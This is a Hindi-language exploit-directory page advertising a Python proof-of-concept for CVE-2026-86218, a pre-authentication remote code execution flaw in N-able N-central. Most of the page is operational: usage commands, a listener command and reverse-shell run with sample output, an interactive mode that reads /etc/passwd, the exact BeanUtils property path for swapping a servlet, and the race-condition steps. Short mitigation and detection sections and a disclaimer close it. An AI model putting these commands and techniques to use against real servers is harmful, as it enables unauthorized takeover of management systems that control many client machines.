Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-86218 — CVE-2026-86218 के लिए Python 3 प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो N-able N-central में Struts मल्टीपार्ट रेस कंडीशन के माध्यम से प्री-ऑथ RCE है, जिसमें कमांड एक्ज़ीक्यूशन और रिवर्स शेल सपोर्ट शामिल है। | Kitploit
उपकरण/GitHubGitHub/super-meuw/cve-2026-86218
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपोस्ट-शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंगरिमोट एक्सेस टूलपेलोड डेवलपमेंट
GitHubsuper-meuw/cve-2026-86218

CVE-2026-86218

CVE-2026-86218 के लिए Python 3 प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो N-able N-central में Struts मल्टीपार्ट रेस कंडीशन के माध्यम से प्री-ऑथ RCE है, जिसमें कमांड एक्ज़ीक्यूशन और रिवर्स शेल सपोर्ट शामिल है।

11घं 45मि पहलेअभी तक समीक्षित नहीं
रिपॉजिटरी देखें

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-86218 - N-able N-central प्री-ऑथ RCE एक्सप्लॉइट

अवलोकन

यह CVE-2026-86218 के लिए एक Python 3 प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट है, जो N-able N-central में एक गंभीर प्री-ऑथेंटिकेशन रिमोट कोड एक्ज़ीक्यूशन भेद्यता है।

भेद्यता विवरण:

  • CVE: CVE-2026-86218
  • CVSS स्कोर: 10.0 (गंभीर)
  • CWE: CWE-96 (स्टैटिक कोड इंजेक्शन)
  • प्रभावित संस्करण: N-central < 2026.3.1.14
  • अटैक वेक्टर: नेटवर्क (अनऑथेंटिकेटेड)

भेद्यता विवरण

N-able N-central एक अनऑथेंटिकेटेड एक्शन (/remoteControlAction.do) पर सत्र-स्कोप्ड Struts फॉर्म का उपयोग करता है। दो समवर्ती मल्टीपार्ट अनुरोध फॉर्म के मल्टीपार्ट हैंडलर को रेस कर सकते हैं और Jetty के लाइव कॉन्फ़िगरेशन को Commons BeanUtils प्रॉपर्टी पॉपुलेशन के लिए उजागर कर सकते हैं। यह एक हमलावर को निम्नलिखित की अनुमति देता है:

  1. एक लेज़ी N-central सर्वलेट होल्डर (जैसे, LogRetrieval) को Jetty के बंडल किए गए CGI सर्वलेट से बदलना
  2. CGI सर्वलेट को /bin/sh -s के माध्यम से मनमाने कमांड निष्पादित करने के लिए कॉन्फ़िगर करना
  3. बदले गए सर्वलेट के URL मैपिंग के माध्यम से कमांड भेजना

आवश्यकताएँ

root@kitploit:~
pip install requests

उपयोग

बुनियादी सिंटैक्स

root@kitploit:~
python3 CVE-2026-86218.py -t <target_url> [options]

विकल्प

विकल्पविवरण
-t, --targetलक्ष्य N-central URL (जैसे, https://192.168.1.100)
-c, --commandनिष्पादित करने के लिए एकल कमांड
-i, --interactiveइंटरैक्टिव कमांड मोड
--lhostरिवर्स शेल के लिए लिसनर IP
--lportलिसनर पोर्ट (डिफ़ॉल्ट: 4444)
--servletबदलने के लिए सर्वलेट: LogRetrieval, FileTransfer, AutomationManagerDownloadServlet
--checkजाँचें कि लक्ष्य भेद्य है या नहीं
--no-verify-sslSSL प्रमाणपत्र सत्यापन अक्षम करें
--timeoutअनुरोध टाइमआउट (डिफ़ॉल्ट: 30s)
--race-delayरेस कंडीशन विलंब (डिफ़ॉल्ट: 0.35s)
-v, --verboseवर्बोज़ आउटपुट सक्षम करें

उदाहरण

1. जाँचें कि लक्ष्य भेद्य है या नहीं

root@kitploit:~
python3 CVE-2026-86218.py -t https://192.168.1.100 --check --no-verify-ssl

अपेक्षित आउटपुट:

root@kitploit:~
[*] Checking target version at https://192.168.1.100
[+] N-central 2026.3.1.13 is vulnerable

2. एकल कमांड निष्पादित करें

root@kitploit:~
python3 CVE-2026-86218.py -t https://192.168.1.100 -c "id" --no-verify-ssl

अपेक्षित आउटपुट:

root@kitploit:~
╔══════════════════════════════════════════════════════════════════╗
║  CVE-2026-86218 - N-able N-central Pre-Auth RCE Exploit       ║
║  Version: 1.0.0                                                ║
║  CVSS: 10.0 (Critical)                                         ║
╚══════════════════════════════════════════════════════════════════╝
[*] Checking target version at https://192.168.1.100
[+] N-central 2026.3.1.13 is vulnerable
[*] Obtaining unauthenticated session...
[*] Performing multipart race condition...
[*] Establishing connection for race condition...
[*] Sending helper request to install handler...
[*] Sending mutation fields...
[+] Race condition completed successfully
[*] Executing command: id
[+] Command executed successfully
uid=998(nable) gid=998(nable) groups=998(nable)

3. रिवर्स शेल

पहले लिसनर प्रारंभ करें:

root@kitploit:~
nc -lvnp 4444

एक्सप्लॉइट चलाएँ:

root@kitploit:~
python3 CVE-2026-86218.py -t https://192.168.1.100 --lhost 10.10.14.5 --lport 4444 --no-verify-ssl

अपेक्षित आउटपुट:

root@kitploit:~
[*] Preparing reverse shell to 10.10.14.5:4444
[!] Starting reverse shell...
[!] Make sure to have a listener running: nc -lvnp 4444
[+] Reverse shell payload sent successfully!
[+] Check your listener for incoming connection

लिसनर आउटपुट:

root@kitploit:~
listening on [any] 4444 ...
connect to [10.10.14.5] from (UNKNOWN) [192.168.1.100] 49234
id
uid=998(nable) gid=998(nable) groups=998(nable)

4. इंटरैक्टिव मोड

root@kitploit:~
python3 CVE-2026-86218.py -t https://192.168.1.100 -i --no-verify-ssl

इंटरैक्टिव सत्र:

root@kitploit:~
╔══════════════════════════════════════════════════════════════════╗
║  CVE-2026-86218 - N-able N-central Pre-Auth RCE Exploit       ║
║  Version: 1.0.0                                                ║
║  CVSS: 10.0 (Critical)                                         ║
╚══════════════════════════════════════════════════════════════════╝
[*] Checking target version at https://192.168.1.100
[+] N-central 2026.3.1.13 is vulnerable
[*] Obtaining unauthenticated session...
[*] Performing multipart race condition...
[+] Race condition completed successfully
[*] Entering interactive command mode
[*] Type 'exit' or 'quit' to leave
[*] Type 'shell' for reverse shell setup

ncentral> id
uid=998(nable) gid=998(nable) groups=998(nable)

ncentral> cat /etc/passwd | head -5
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
...

ncentral> shell
Listener IP: 10.10.14.5
Listener Port: 4444
[*] Preparing reverse shell to 10.10.14.5:4444
[+] Reverse shell payload sent successfully!

ncentral> exit

5. भिन्न सर्वलेट का उपयोग करना

root@kitploit:~
# Use FileTransfer servlet (more disruptive)
python3 CVE-2026-86218.py -t https://192.168.1.100 -c "id" --servlet FileTransfer --no-verify-ssl

सर्वलेट विकल्प

सर्वलेटविवरणप्रभाव
LogRetrievalलॉग रिट्रीवल एंडपॉइंट (डिफ़ॉल्ट)सबसे कम विघटनकारी, रीस्टार्ट तक लॉग अनुपलब्ध
FileTransferफ़ाइल ट्रांसफर एंडपॉइंटफ़ाइल ट्रांसफर कार्यक्षमता बाधित करता है
AutomationManagerDownloadServletऑटोमेशन मैनेजर डाउनलोडप्रबंधन UI पोर्ट (8443) की आवश्यकता है

यह कैसे काम करता है

शोषण प्रवाह

  1. संस्करण जाँच: त्रुटि पृष्ठ से संस्करण निकालने के लिए /remoteControlAction.do को क्वेरी करें
  2. सत्र अधिग्रहण: अनऑथेंटिकेटेड JSESSIONID प्राप्त करें
  3. रेस कंडीशन:
    • एक धीमा मल्टीपार्ट अनुरोध भेजें जो पार्सिंग के दौरान रुक जाता है
    • रुके रहने के दौरान, साझा फॉर्म पर हैंडलर स्थापित करने के लिए एक सहायक अनुरोध भेजें
    • BeanUtils प्रॉपर्टी इंजेक्शन फ़ील्ड के साथ धीमा अनुरोध फिर से शुरू करें
  4. सर्वलेट प्रतिस्थापन: LogRetrieval को Jetty CGI सर्वलेट से बदलें
  5. कमांड निष्पादन: CGI एंडपॉइंट के माध्यम से कमांड भेजें

तकनीकी विवरण

यह भेद्यता Struts के मल्टीपार्ट फॉर्म हैंडलिंग में एक रेस कंडीशन का शोषण करती है:

  • Struts प्रति HTTP सत्र एक फॉर्म ऑब्जेक्ट संग्रहीत करता है
  • एक मल्टीपार्ट अनुरोध की शुरुआत में, Struts फॉर्म का मल्टीपार्ट हैंडलर हटा देता है
  • एक धीमा अनुरोध तब रुक जाता है जब Struts अभी भी बॉडी पढ़ रहा होता है
  • एक सहायक अनुरोध समाप्त होता है और अपना आरंभीकृत हैंडलर स्थापित करता है
  • जब धीमा अनुरोध जारी रहता है, तो BeanUtils हैंडलर के माध्यम से तैयार किए गए फ़ील्ड नामों का अनुसरण करता है
  • ये फ़ील्ड Jetty के WebAppContext तक पहुँचते हैं और सर्वलेट होल्डर को बदल देते हैं

म्यूटेशन फ़ील्ड JavaBean प्रॉपर्टी पथों का उपयोग करते हैं:

root@kitploit:~
multipartRequestHandler.servlet.servletContext.classLoader.context.servletHandler.servlet(LogRetrieval).heldClass

यह निम्नलिखित को पार करता है: मल्टीपार्ट हैंडलर → सर्वलेट कॉन्टेक्स्ट → क्लासलोडर → WebAppContext → सर्वलेट हैंडलर → विशिष्ट होल्डर

शमन

  1. तुरंत पैच करें: N-central 2026.3.1.14 या बाद के संस्करण में अपग्रेड करें
  2. पहुँच प्रतिबंधित करें: N-central कंसोल तक इनबाउंड पहुँच सीमित करें
  3. नेटवर्क सेगमेंटेशन: N-central को VPN या IP अनुमति-सूची के पीछे रखें
  4. लॉग की निगरानी करें: संदिग्ध API गतिविधि और उपयोगकर्ता निर्माण की जाँच करें

पहचान

लॉग संकेतक

  • /remoteControlAction.do पर असामान्य अनुरोध
  • असामान्य फ़ील्ड नामों वाले मल्टीपार्ट अनुरोध
  • LogRetrieval एंडपॉइंट पर CGI-संबंधित गतिविधि
  • अप्रत्याशित उपयोगकर्ता खाता निर्माण

नेटवर्क संकेतक

  • एक ही एंडपॉइंट पर कई तेज़ अनुरोध
  • बड़े मल्टीपार्ट पेलोड
  • असामान्य स्रोत IP से कनेक्शन

संदर्भ

  • N-able Security Advisory
  • N-able Hotfix 4 Release Notes
  • Rapid7 Metasploit Module
  • Huntress Blog Post
  • CISA KEV Catalog

अस्वीकरण

यह एक्सप्लॉइट केवल अधिकृत सुरक्षा परीक्षण और शैक्षिक उद्देश्यों के लिए प्रदान किया गया है। उन सिस्टमों के विरुद्ध इस एक्सप्लॉइट का अनधिकृत उपयोग जिनके आप स्वामी नहीं हैं या जिनका परीक्षण करने की अनुमति नहीं है, अवैध और अनैतिक है।

पेनेट्रेशन टेस्टिंग गतिविधियाँ संचालित करने से पहले हमेशा उचित प्राधिकरण प्राप्त करें।

श्रेय

  • भेद्यता खोज: N-able Security Team
  • Metasploit मॉड्यूल: sfewer-r7 (Rapid7)
  • एक्सप्लॉइट विकास: Rapid7 अनुसंधान और सार्वजनिक सलाहकारों पर आधारित
टूल डाउनलोड करें